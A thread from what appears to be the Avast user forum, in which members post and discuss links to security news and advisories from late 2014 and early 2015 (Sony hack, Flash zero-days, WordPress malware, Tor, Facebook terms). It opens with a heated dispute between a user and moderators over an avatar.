MY arguement would now be that if i changed the avatar people reading the comment would presume my choice of picture was a lot worse than what it is... ill be finishing my clear up and closing my account and using another AV.... i am absolutely discusted at this.. ESSEX BOY and PONDUS have not commented on this and now someone is pulling their weight because ive upset them by replying to their warning publicly...
I would also like to add that i have used me own name on this forum and my professional email address.. i find it incredibly libelous to have this all pinned against my name on someone arbitrary judgement!
-
And i notice the two moderator who previously interacted with me have had nothing to say on the matter..
-
Hi peri.ramadan,
I personally do not take any objection here, but note that such reactions could be a cultural position.
Americans as a rule are known to be far more puritan where these issues are concerned.
Any "explicit picture" could evoke some Victorian reaction,
while we Europeans feel more shocked by violence etc, where Americans see no big issue.
Law and customs of the land, I assume... ;D
polonus
-
And i notice the two moderator who previously interacted with me have had nothing to say on the matter..
Thanks for the fix. I personally had no objections to the picture you used and you're correct, some live bathing beauties show much more.
This is however a family oriented forum. :)
-
Well maybe a few of the other moderators should take note of the way you are able to convey a point without coming across as bigoted and rude!...
With the climate today (in europe, i politely add - as i now understand there is an evident difference!) there is alot of fingerpointing and witch hunting concerning child abuse... i now have my name next to something that suggests that!...
I am uninstalling my Avast antivirus and welcome the americans and prudes to this forum... maybe a little focus on cultural understanding bothways accross the atlantic.. im not going to start some vendetar as there are prudish and hypersensitive people EVERYWHERE... but perhaps a meeting amongst the moderators on this site to ensure this doesnt happen again to someone who has joined the community politely looking for help and asking valid insightful questions... and one moderator picking up on something they do not like should perhaps be discussed between them and the moderators who have built a raport and have interacted with the member in question so it does not look like a arbitary smack from one moderator with a bee in their bonnet....
Sorry I ever bothered anyone on here.. i am extremely embarrassed by Avast as a whole and wont be using this program.. when my business is up and running and as it grows, moderators have destroyed a relationship of behalf of avast and there should be some recorse for that!
-
I personally do not take any objection here, but note that such reactions could be a cultural position.
With a name like Ramadan..?? Im being told about cultural sensitivities on avast!
-
but perhaps a meeting amongst the moderators on this site to ensure this doesnt happen again to someone
I think you're being a bit hyper sensitive. Changing an avatar is something many do on a regular basis.
Uninstalling Avast because of this makes no sense.
Have a great day and go on with life. This kind of petty issue is too meaningless to get upset about. :)
-
Well see how Vincent Steckler feels about this one way street you have layed around her.
I am not hypersensitive to the fact i have been asked to change my avatar i am discusted at how you have decided to go about it.
Ive contacted Vincent as perhaps a tighter leash is required for this forum as it represents the whole company..
It is a matter of principal
-
Hi peri.ramadan,
Let this not get into your hairs, nothing to overreact about and just a misunderstanding.
This is how it works. For instance when I blurp at home over my meal everybody say I have bad manners and I am a jerk.
When I am out in China and blurp after swallowing my noodles in a restaurants then that is taken as a sign that I have enjoyed my meal and the waiter is very satisfied.
When I eat sphagetti in America I can use a fork and a spoon, if I had Italian relatives from some parts of Italy eating with just a fork is the way.
Table manners and forum manners we haven't come to the latest word yet.
Welcome and be our guest. The first thing bob3160 did when I entered the forum now over ten years ago was pointing out my avatar was too big in size. That is a long time ago and since we became good friends, so hang on - it cannot be all that bad,
polonus
-
No i am sorry i am totally discusted. When one of the two moderators i have already named decide to stand up and be counted for perhaps not saying anything to begin with.. why have i got a warning? and why has the mention of children been made at me..? it is a stigma which i refuse to have attached to my name ... now i have changed it like i have already said people can presume what they like was there...
I have already contacted mr Steckler because bobs conduct was libelous and I wont stand for that virtually or in any "real" setting
This is not the same as burping this is being treated like some type of child abuse advocate
-
http://www.lgbtqnation.com/2013/08/scotland-man-ordered-to-pay-61k-for-calling-teacher-a-pedophile-on-twitter/
-
http://www.lgbtqnation.com/2013/08/scotland-man-ordered-to-pay-61k-for-calling-teacher-a-pedophile-on-twitter/ (http://www.lgbtqnation.com/2013/08/scotland-man-ordered-to-pay-61k-for-calling-teacher-a-pedophile-on-twitter/)
Maybe you need a little education or a better understanding of the language ??? I don't know what your problem is in here but, no one called you any sych thing.
A simple request to change your avatar has for some ridiculous reason on your part been turned into a name calling contest.
Hopefully Vincent will get back to you even if I think you're trying to make a mountain out of absolutely nothing.
Grow Up!
-
SO a simple inbox message would not have surficed then bob? Public humiliation is a far more effective technique!
It has not turned into a name calling contest. i am acting on the principal that child welfare was brought up straight away.
Your conduct has been outragious. Upon receiving an immediate response from mr Steckler, I have sent the copy of my orignial avatar.
My understanding of the English language is fine thank you, i hope your understanding of law is on par though as you may be needing it sir.
-
SO a simple inbox message would not have surficed then bob? Public humiliation is a far more effective technique!
It has not turned into a name calling contest. i am acting on the principal that child welfare was brought up straight away.
Your conduct has been outragious. Upon receiving an immediate response from mr Steckler, I have sent the copy of my orignial avatar.
My understanding of the English language is fine thank you, i hope your understanding of law is on par though as you may be needing it sir.
Wasting any more replies on this is senseless. Since you seem to be super sensitive and assume anything asked of you is a personal attack,
I leave you to your own conclusions.
Threatening me or any one else with with a lawsuit is however not looked upon lightly. Please choose your words more wisely.
-
Thank you for changing your Avatar.
This forum is accessed by youngsters.
Thanks. :)
I'm with Bob here.
But I really suggest we turn back to topic (security warnings), please.
-
Fake free codes scam affects PSN and Steam users
https://blog.avast.com/2014/12/05/fake-free-codes-scam-affects-psn-steam-users/
-
Our qualified removers will still have a lot to do as you can conclude from this report: http://www.av-comparatives.org/wp-content/uploads/2014/12/avc_rem_201411_en.pdf (http://www.av-comparatives.org/removal-tests/).
AV solutions are not always able to completely cleanse malware from your computer leaving executable files, MBR- or register changes, changed hostfiles etc. behind.
polonus
-
AIS didn't fare much better here http://www.av-comparatives.org/wp-content/uploads/2014/11/avc_per_201410_en.pdf
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
Big brother is alive and well.
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html (http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html)
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
Big brother is alive and well.
Maybe if these Judges were forced to live in a country where there is no freedom they would realizes how precious freedom really is ???
-
VirRnsm, the ransomware revisited: https://nakedsecurity.sophos.com/2014/12/05/notes-from-sophoslabs-ransomware-with-a-difference-this-one-is-a-true-virus/ link article author Sophos's Paul Ducklin
polonus
-
Do not fall vicitim to scam/spam robots (invite dot com) while Skype ads are known to be compromised.
Read about such ill bot activity here: https://forum.avast.com/index.php?topic=162424.msg1160190#msg1160190
Block everyone outside of your known contacts!
polonus
-
Microsoft Security Bulletin Advance Notification for December 2014
https://technet.microsoft.com/library/security/ms14-dec
-
There should have been more openness on govmt malware: http://www.technologyreview.com/view/533136/antivirus-companies-should-be-more-open-about-their-government-malware-discoveries/ link article author: Bruce Schneier
polonus
-
There should have been more openness on govmt malware: http://www.technologyreview.com/view/533136/antivirus-companies-should-be-more-open-about-their-government-malware-discoveries/ (http://www.technologyreview.com/view/533136/antivirus-companies-should-be-more-open-about-their-government-malware-discoveries/) link article author: Bruce Schneier
polonus
Honesty in (ANY) Government hasn't existed for a lot longer than I've been around. (That's been a few years. :) )
-
Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON
http://www.theregister.co.uk/2014/12/05/regin_kaspersky/
-
(0Day) Microsoft Internet Explorer display:run-in Use-After-Free Remote Code Execution Vulnerability
http://zerodayinitiative.com/advisories/ZDI-14-403/
-
“Pardon my intrusion; my name is…”
https://blog.malwarebytes.org/fraud-scam/2014/12/pardon-my-intrusion-my-name-is/
maybe Bob got one of these?......he usually get them all
-
Online medical billing service tricked people...
https://nakedsecurity.sophos.com/2014/12/08/online-medical-bill-site-tricked-people-to-hand-over-health-records/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
Dangers of not changing the default password revealed in webcam exposé
http://blogs.norman.com/2014/for-consumption/dangers-of-not-changing-the-default-password-revealed-in-webcam-expose
-
Read about new Poodle exploit: https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls
and test your domain for it: https://www.ssllabs.com/ssltest/
If this is not a domain you own you are not to publish eventual scan results
Typosquatters are cashing in great time now.
polonus
-
Microsoft, Google, Others Threaten to Sue Adblock Plus Creator
http://news.softpedia.com/news/Microsoft-Google-Others-Threaten-to-Sue-Adblock-Plus-Creator-467035.shtml
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
polonus
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/ (http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/)
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
-
More about the Sony hacking.
http://mashable.com/2014/12/09/sony-hack-details/
http://www.ibtimes.com/sony-corporation-strikes-back-its-using-amazon-servers-attack-torrent-sites-report-1748849
http://time.com/3623456/sony-hack-unprecedented/
http://www.ibtimes.com/sony-corporation-hackers-release-second-wave-private-data-1744076
http://www.bidnessetc.com/30495-more-misery-for-sony-corporation-hacked-again/
-
Project Goliath: Sony leaks reveal alleged MPAA plot against Google
http://rt.com/news/214167-goliath-sony-hack-google/
-
Hi Abruptum,
Ad-Industry versus Content-Industry.
polonus
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/ (http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/)
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
deleted
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/ (http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/)
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
Not sure if your serious or not Bob, are you suggesting that China be broken up? The 3rd largest country on the planet, the country with the largest population on the planet, the country with the largest economy on the planet. So who will break it up, the United States? Not going to happen, the US has enough problems of its own and probably 50% of the planet wishes they would break up. I really hope you weren't serious.
Why are you trying to turn a satirical answer into a political discussion ???
Here in the US it's been a practice that when a company gets to big and powerful, you slap a monopoly tag on them and break them up.
(Then they usually wait for the little companies to get big enough to do it all over again....)
-
Dutch users will massively leave facebook now and go to seen.is or Ello
because of the new Facebook terms that seem just one bridge too far for many of them.
Also read: http://blog.megafanapps.com/2014/11/26/will-people-massively-delete-their-facebook-profiles-on-december-31/
When you go there every 10 minutes to check on facebook,
you could give this a try: http://time.com/2969873/99-days-of-freedom-facebook-experiment/
I personally I have no facebook or social media account, but I found the above news online interesting.
polonus
-
Dutch users will massively leave facebook now and go to seen.is or Ello
because of the new Facebook terms that seem just one bridge too far for many of them.
Also read: http://blog.megafanapps.com/2014/11/26/will-people-massively-delete-their-facebook-profiles-on-december-31/ (http://blog.megafanapps.com/2014/11/26/will-people-massively-delete-their-facebook-profiles-on-december-31/)
When you go there every 10 minutes to check on facebook,
you could give this a try: http://time.com/2969873/99-days-of-freedom-facebook-experiment/ (http://time.com/2969873/99-days-of-freedom-facebook-experiment/)
I personally I have no facebook or social media account, but I found the above news online interesting.
polonus
Targeted ads and the ability to reject any ads you don't want including removing that ad on all devices that have Facebook installed.
Am I missing something but I don't see anything that's harmful ??? An improvement yes.
-
Hi bob3160,
What they are against and I think always was in the facebook terms is that all you post there becomes owned by facebook.
Names, content and profile photo's can be so used by facebook. Photo's and video's could be even sold to a third party even under the new rules.
The trend to leave facebook seems global according to this survey: http://blog.globalwebindex.net/facebook-teens-decline
This is why a lot of users will leave as these new rules come into play on January 1st.
Well it is like going to a public place with thin cardbox walls, there is not privacy left.
"A service of many an undesired possibility", but did not they know that all along and a long time ago?
But another new trend now is that you can go to a fastfood place nearby
to get your online film present along with your salad menu order.
Another reason for tension between ad-marketing industry and content-industry, I assume.
polonus
-
I'm sure that this social networking content ownership thing has reared its head years ago (once uploaded, passed to the service provider).
Now I don't know if at that point facebook was in the frame or not - but the idea of ownership was certainly known about. But most people don't bother reading the small print of the T&Cs.
-
Hi DavidR,
The only right/quarantee you have is that that free service is being terminated or the availability of the content you provided is discontinued at any time the service provider seems fit, because you don't own that platform. It can be sold or can go broke.
Same here on the avast forums - you only can hope avast continues their free service and alsp protect our content as they have no obligation to do. So we could and also should be very grateful. Also you cannot provide content on behalf of others, just like you cannot give your neigbour's dog away. So the content may be yours (whenever it does not infringe copyright when shown), but the availability thereof online is completely out of your hands.
polonus
-
FBI Warns U.S. Businesses to Be on Guard Against Iran Hack Attacks
http://www.nbcnews.com/tech/security/fbi-warns-u-s-businesses-be-guard-against-iran-hack-n267561
-> https://forum.avast.com/index.php?topic=66267.msg1159107#msg1159107
-
FBI Warns U.S. Businesses to Be on Guard Against Iran Hack Attacks
http://www.nbcnews.com/tech/security/fbi-warns-u-s-businesses-be-guard-against-iran-hack-n267561
-> https://forum.avast.com/index.php?topic=66267.msg1159107#msg1159107
False flag. Demonization of Iran,Russia and China continues.I don't trust western mass media.
-
As bob3160 always says and he has some very good and sound points always,
is to better refrain from a couple of topics to keep the discussion here nice and cultural.
So no politics and religion. A question of mutual respect.
Such topics should stay a big no no, not only when you dine out with your boss, but also in a public forum.
polonus
-
SoakSoak dot ru Malware Compromises 100.000 WP sites! (registered in the States)
Read: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Complaints on WP forum: https://wordpress.org/support/topic/all-my-sites-6-hacked-with-soaksoakru
Webmasters should install Wordfence and scan to find the malcode issue.
See the VirusTracker result: soak.soak dot ru,72.52.4.119,ns2.sedoparking dot com,Criminals,
(meaning up and active maware there)
IP with a Sality3 variant that avast detects as Win32:Kukacka.
polonus
-
So no politics and religion. A question of mutual respect.
Such topics should stay a big no no, not only when you dine out with your boss, but also in a public forum.
+1 Nothing more to add, thanks Pol.
-
ICANN Targeted in Spear Phishing Attack | Enhanced Security Measures Implemented
https://www.icann.org/news/announcement-2-2014-12-16-en
-
Cellphones insecure by default: http://www.washingtonpost.com/blogs/the-switch/wp/2014/12/18/german-researchers-discover-a-flaw-that-could-let-anyone-listen-to-your-cell-calls-and-read-your-texts/
polonus
-
More to the so-called Sony Hack as assumed at first sight - sloppy error-ridden malcode used,
-> http://arstechnica.com/security/2014/12/state-sponsored-or-not-sony-pictures-malware-bomb-used-slapdash-code/
read: http://techcrunch.com/2014/12/17/sony-pictures-employees-now-working-in-an-office-from-ten-years-ago/
polonus
-
More to the so-called Sony Hack as assumed at first sight - sloppy error-ridden malcode used,
-> http://arstechnica.com/security/2014/12/state-sponsored-or-not-sony-pictures-malware-bomb-used-slapdash-code/ (http://arstechnica.com/security/2014/12/state-sponsored-or-not-sony-pictures-malware-bomb-used-slapdash-code/)
read: http://techcrunch.com/2014/12/17/sony-pictures-employees-now-working-in-an-office-from-ten-years-ago/ (http://techcrunch.com/2014/12/17/sony-pictures-employees-now-working-in-an-office-from-ten-years-ago/)
polonus
Two wrongs never make one right. The movie never should have been made and neither should the hack. IMHO :)
-
12 million routers now cookie-holed: http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/
and http://www.checkpoint.com/press/2014/media-alert-check-point-researchers-discover-significant-vulnerability-used-take-control-millions-consumer-business-internet-routers/
polonus
-
Hacker hijacks unlocked machines through usb=device: https://github.com/samyk/usbdriveby
polonus
-
Google "Goliath" versus the Content Industry news leaked out via Sony Hack: http://www.theverge.com/2014/12/12/7382287/project-goliath
polonus
-
Certain parties will try disable the Tor Network within a couple of days by taking down the "drectory authorities".
Tor users will be warned when the network will be incapicitated.
Who are the alleged attackers is not known so far.
https://blog.torproject.org/blog/possible-upcoming-attempts-disable-tor-network
It is rumored however that Tor will be brought down over the weekend
and a swoop could be related to the US government's investigation into the Sony Pictures mega-hack
or that this might be used as a pretext to take it down.
polonus
P.S. We will see things like this: ERROR: Gateway Timeout
While trying to retrieve the URL http://128.31.0.39/:
No route to host
Your cache administrator is webmaster.
Generated Sat, 20 Dec 2014 14:25:53 GMT by ::ffff:192.168.177.1 (Mikrotik HttpProxy)
Read: https://news.ycombinator.com/item?id=8774833
-
It's The Season:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1419092790804-68886.png)
-
NTP versions not stable, not completely tested and with issues and now also found to be exploitable.
Verdict: stop using it: https://blog.hboeck.de/archives/863-Dont-update-NTP-stop-using-it.html
In stead use: http://chrony.tuxfamily.org/
polonus
-
Staples Provides Update on Data Security Incident
http://staples.newshq.businesswire.com/statement
-
As predicted in an earlier post in this thread: http://www.theregister.co.uk/2014/12/22/stay_away_popular_tor_exit_relays_look_raided/
Previous warning from admin: http://article.gmane.org/gmane.network.tor.user/34619
Servers have been blacklistened and form no danger now to Tor-users.
polonus
-
Google Safebrowsing blocked 39.000 infested WP-sites: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Check your site with: https://wordpress.org/plugins/sucuri-scanner/
Lots of sites became infested because the vulnerable plog-in software did not have the latest patches.
polonus
-
Windows: Elevation of Privilege in ahcache.sys/NtApphelpCacheControl
https://code.google.com/p/google-security-research/issues/detail?id=118
-
75% of PHP installations unsafe: http://blog.ircmaxell.com/2014/12/php-install-statistics.html
blog link author = Anthony Ferrara
Remember there is nothing wrong with PHP, but there is so much more wrong with PHP programming.
In combination with outdated CMS and in the hands of/adviced by people with no insight a very, very dangerous code-brew however ;D
For checking info see this resources: http://php.net/manual/en/function.phpinfo.php :o
Check version number with exploit and you have a beginner's attack formula.
So PHP and server version number info proliferation is still a big problem.
polonus
-
GoGO in-flight WiFi uses a false Google certificate to filter streaming video -> http://www.theregister.co.uk/2015/01/06/gogo_ssl/
At least where net equality is concerned we know where these guys stand in that discussion - the priviliged and those that can paywill have the fast lane, the others are forced down the slow lane and they force it in by all means.
polonus
-
I'm probably not posting this on the right forum, and I don't know if this is a problem with my Avast software or my other anti-virus program (AdvancedSystemCare by IObit) but--- I keep getting this message window that says - SearchProtection.exe - Fatal Application Exit Unhandled exception. It then has a ExpCode number, ExpFlag, and Exp address. The window says I should report it immediately.
What do I do?
-
I'm probably not posting this on the right forum, and I don't know if this is a problem with my Avast software or my other anti-virus program (AdvancedSystemCare by IObit) but--- I keep getting this message window that says - SearchProtection.exe - Fatal Application Exit Unhandled exception. It then has a ExpCode number, ExpFlag, and Exp address. The window says I should report it immediately.
What do I do?
You're right - this topic isn't correct, this is for security based announcements.
You can start a new topic in the Viruses & Worms sub-forum https://forum.avast.com/index.php?board=4.0 (https://forum.avast.com/index.php?board=4.0). This however may not be necessary as I believe the crux of the matter is your comment "my other anti-virus program, having multiple AVs installed is asking for conflict issues as both dogs fight over one bone.
So I would suggest that you uninstall "AdvancedSystemCare by IObit" - you might also do a search for IObit in the forums as there as some disturbing reports.
-
In the news – Managed internet devices and biometry
http://blogs.norman.com/2015/business/managed-internet-devices-biometry
Biometric access control has gained popularity with mobile phones in recent years. We have seen it used in movies for years, where iris- and fingerprint scanners have been portrayed as a fool-proof way of identifying users. There are two problems with this:
– The methods are not fool proof, as demonstrated at the CCC conference.
– Your biometric information cannot be changed. Once copied by a perpetrator, a person cannot use it for identification anymore.
-
AOL halts malicious ads served by its advertising platform (http://www.pcworld.com/article/2866192/aol-halts-malicious-ads-served-by-its-advertising-platform.html)
Guess that's why they call it AOhelL :)
-
Before you enable those macros…
http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
-
Microsoft's Skype victim of malvertisers: http://community.skype.com/t5/Windows-desktop-client/Skype-serving-virus-laden-ads/td-p/3818431
Now I am glad, bob3160 taught me how to block ads inside Skype.
It is now also blocks malvertisements.
polonus
-
Revolving satirical security news ;D - refresh the page and get a new "who's done it": http://sony.attributed.to/
polonus
-
Revolving satirical security news ;D - refresh the page and get a new "who's done it": http://sony.attributed.to/ (http://sony.attributed.to/)
polonus
Happy to help :)
It also saves me even though right now I'm still using the paid version. The changes will come in handy when the Pro version
trial ends and I go pack to the free version.
-
Hi guys, some bad news. :(
Evolving Microsoft's Advance Notification Service in 2015
http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx
We are making changes to how we distribute ANS to customers. Moving forward, we will provide ANS information directly to Premier customers and current organizations involved in our security programs, and will no longer make this information broadly available through a blog post and web page.
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1420898242636-59821.png)
(From my current presentation)
-
This isn't a security warning or notice as such:
Cybercrime Stories: Sandra
http://us.norton.com/cybercrime-stories-sandra/article (http://us.norton.com/cybercrime-stories-sandra/article)
But it is a strong word of caution on how what we do and click on, and where we go, whilst on the Internet, may have disastrous consequences in our personal lives. Know your enemy and how they operate.
-
Hacking for a good cause:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1421078864897-98015.png)
Anonymous hits the first target of ‘Operation Charlie Hebdo’ (http://www.neowin.net/news/anonymous-hits-the-first-target-of-operation-charlie-hebdo)
-
Windows Elevation of Privilege in User Profile Service
https://code.google.com/p/google-security-research/issues/detail?id=123
-
Epic Fail and Imago Damage: http://www.washingtonpost.com/news/checkpoint/wp/2015/01/12/centcom-twitter-account-apparently-hacked-by-islamic-state-sympathizers/
polonus
-
Corel Software DLL Hijacking
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
-
Malvertisers abuse AdSense through Malvertising Campaign: http://blog.sucuri.net/2015/01/adsense-abused-with-malvertising-campaign.html (link article author = Sucuri's Denis Sinegubko.
polonus
-
Hacked WiFi Routers Causing Latest Lizard Squad Attacks.
http://www.techweekeurope.co.uk/networks/lizard-squad-home-routers-ddos-159281#F1HzVpohhU2rk2Ts.99
edit: avast CTO, Ondrej Vlcek, comments.
-
New report: DHS is a mess of cybersecurity incompetence
http://www.zdnet.com/article/new-report-the-dhs-is-a-mess-of-cybersecurity-incompetence/ (http://www.zdnet.com/article/new-report-the-dhs-is-a-mess-of-cybersecurity-incompetence/)
Department of Homeland Security=DHS
-
Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag
https://code.google.com/p/google-security-research/issues/detail?id=128
-
No link but...evidently there are some rogue companies running a scam by posing as "official"
avast third party support. Using the third party support is a bad idea to begin with but to "fake"
users into believing them to be legit is even worse. The forums are the best place to start, our help is free.
This is something I read on Google+.
-
Verizon injects zombiecookie headers in corporation with Turn.
What can we do against zombiecookies: https://www.eff.org/deeplinks/2015/01/which-apps-and-browsers-protect-you-against-verizon-and-turns-non-consensual (article author = Peter Eckersley)
polonus
-
Crapware now that can only be cleansed by a complete uninstall and reinstall of Google Chrome:
2 examples: 1. https://forum.avast.com/index.php?topic=164653.msg1173888#msg1173888
and
3. https://forum.avast.com/index.php?topic=164635.msg1173727#msg1173727
(credits for this cleansing method should go to Sam Yrlund on Google Discusssion Groups).
Our qualified removal expert, essexboy, gives the following explanation:
What it is, is a change to a legitimate Firefox (or in your case Chrome) file that prevents the extensions being removed
polonus
-
This Polar SSL Security Vulnerability should be patched : https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2014-04
Do not know of any consequences for avast VPN?
polonus
-
Well
7 Out Of 8 Free Antivirus Programs Come Bundled With PUPs!
http://blog.emsisoft.com/2015/01/17/has-the-antivirus-industry-gone-mad/?ref=ticker150119&utm_source=newsletter&utm_medium=newsletter&utm_content=blog&utm_campaign=ticker150119 (http://blog.emsisoft.com/2015/01/17/has-the-antivirus-industry-gone-mad/?ref=ticker150119&utm_source=newsletter&utm_medium=newsletter&utm_content=blog&utm_campaign=ticker150119)
-
The NSA not only creates, but also hijacks, malware with Quantumbot
http://www.computerworld.com/article/2871687/the-nsa-not-only-creates-but-also-hijacks-malware-with-quantumbot.html (http://www.computerworld.com/article/2871687/the-nsa-not-only-creates-but-also-hijacks-malware-with-quantumbot.html)
-
Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK
http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
New Flash 0-day - blocked by MBAE
https://forums.malwarebytes.org/index.php?/topic/163793-new-flash-0-day-blocked-by-mbae/
-
An overwhelming majority of websites have less optimal or rather bad server security header implementation.
Headers may be missing, wrong implemented or not following best practices.
I arrived at these conclusions from my continuous website scans, mainly reported in the virus and worms section of the forums.
Just scan with scanners here: http://cyh.herokuapp.com/cyh (scan with eventual recommendations)
or here (beta-scan): https://securityheaders.com/test-http-headers.php
For ASP.NET Websites use the Automated Security Analyser for ASP.NET Websites: https://asafaweb.com/
Main prevailing issues are excessive header info proliferation, http only cookies warning, and clickjacking warning.
Also a lot of sites with custom-errors FAIL.
For Google chrome there is an extension from: https://www.recx.co.uk/ to give additional information.
Recx Security Analyser v.1.3.0.4.
When implementations are missing, wrong or not following best practices it is much easier for attackers to abuse websites.
Webmasters and hosting parties alike should pay more attention to these issues, so visitors of websites will be better protected.
To start with this, read here: https://xato.net/secure-coding/security-headers/
also: https://www.owasp.org/index.php/List_of_useful_HTTP_headers#Check_Your_Headers
also: https://www.veracode.com/blog/2014/03/guidelines-for-setting-security-headers
polonus (volunteer \website security analyst and website error-hunter)
-
Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK
http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
New Flash 0-day - blocked by MBAE
https://forums.malwarebytes.org/index.php?/topic/163793-new-flash-0-day-blocked-by-mbae/
Is Avast going to do something to protect us before Flash Player update ?
It is not big problem for me since I keep all plugins disabled and use them when needed.
-
One of the big experts on website malware, REDLEG, lists malware threats of the day:
http://aw-snap.info/articles/malware-of-the-day.php
Redleg's file viewer is a renowned tool to analyze the code on one's website for threats and issues:
http://aw-snap.info/file-viewer/
Here Regleg is also very active helping the website security community: https://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
polonus (volunteer website security analyst and website error-hunter)
-
New" Flash = Trash" Zero-Day actively being abused: http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html (article author = Kafeine)
polonus
-
Chrome as yet does not support Support for X-Frame-Options: Allow-From [uri]
: https://bugs.webkit.org/show_bug.cgi?id=94836
So chrome is defenseless against clickjacking :o (Has basic support - ALLOW-FROM support = Not supported)
Who can confirm this is the actual situation for the chrome browser?
Best parctices: http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx
polonus
-
Account Stealing Wallpaper App found in Google Play Store
https://blog.malwarebytes.org/mobile-2/2015/01/account-stealing-wallpaper-app-found-in-google-play-store/?utm_source=Gplus&utm_medium=social
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1422133007522-6407.png)
Another Good source for freeware now in bad hands. (http://www.davescomputertips.com/rip-freewarebb/)
-
Security Advisory – Vulnerabilities in Pagelines/Platform theme for WordPress
http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html
-
Facebook is not fond of watermarking your images on facebook.
The Dutch app Reclaim has been offline now for a week and it is not known why this happened.
This app to protect your photo's through watermarking apparently still in use: http://www.dmca.com/facebook.aspx
Watermarking images may conflict with the new terms and conditions from facebook-> http://www.telegraph.co.uk/technology/social-media/9780565/Facebook-terms-and-conditions-why-you-dont-own-your-online-life.html
(new terms and conditions come into effect Jan. 30th this year)
Anyone to react?
polonus
-
Beware The Dreaded Trojan JS:Agent-DIE [Trj]
http://www.skyvalleychronicle.com/BREAKING-NEWS/BEWARE-THE-DREADED-TROJAN-BR-Trojan-JS-Agent-DIE-Trj-1999393
-
Sites may detect the local IP address in browsers supporting WebRTC
http://www.ghacks.net/2015/01/27/sites-may-detect-the-local-ip-address-in-browsers-supporting-webrtc/
Button to activate/desactivate Webrtc in Firefox :
https://addons.mozilla.org/en-US/firefox/addon/webrtc-button/?src=ss
-
IE11 data
-
Sites may detect the local IP address in browsers supporting WebRTC
Quote from the article: The only extensions that block these look ups are JavaScript blocking extensions such as NoScript for Firefox.
-
Malvertiser acrivity on XHAMSTER site: https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
polonus
-
Flash is actively being attacked , so-called Angler-atatck,
so check tour Flash version that you are not vulnerable here:
http://www.adobe.com/software/flash/about/
polonus
-
This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
-
Not sure if this is the right place so no flaming please. As to Avast it nagged me into upgrading my "outdated software" so I updated Java 7 to Java 8. After this had been done I discovered that I was locked-out of a website that sells marine equipment.
Next I went to Control Panel and uninstalled Java 8. After that it was Rollback my computer to an earlier date. That worked OK but I just don't need all this hassle. As the old saying goes "If it aint broke don't fix it."
-
Hi david.benyon,
Well Java creating some problems, just an ordinairy thing.
So avoid where you can do without.
To-day I had to survey at a java developer's exam treating a foo example.
You know what foo meant originally?
The term derived from a combination of the f-word (yes, that 5 letter term) and oo coming from up,
to describe how you felt apparently.... ;) some add BAR meaning Beyond Any Recognition - so FUBAR....
Actually it is a term to denote anything in code, so just a name for some code example, the type name of a "class".
So if Java foo-ed you, it is no big surprise for me.
Outdated Java is a remarkable security risk as all zero-days go.
polonus (volunteer website security analyst and website error-hunter)
-
This is probably the reason why Google is officially changing to HTML5 for YouTube. :)
I think they did a while ago, since I could watch youtube videos with Flash disabled.
-
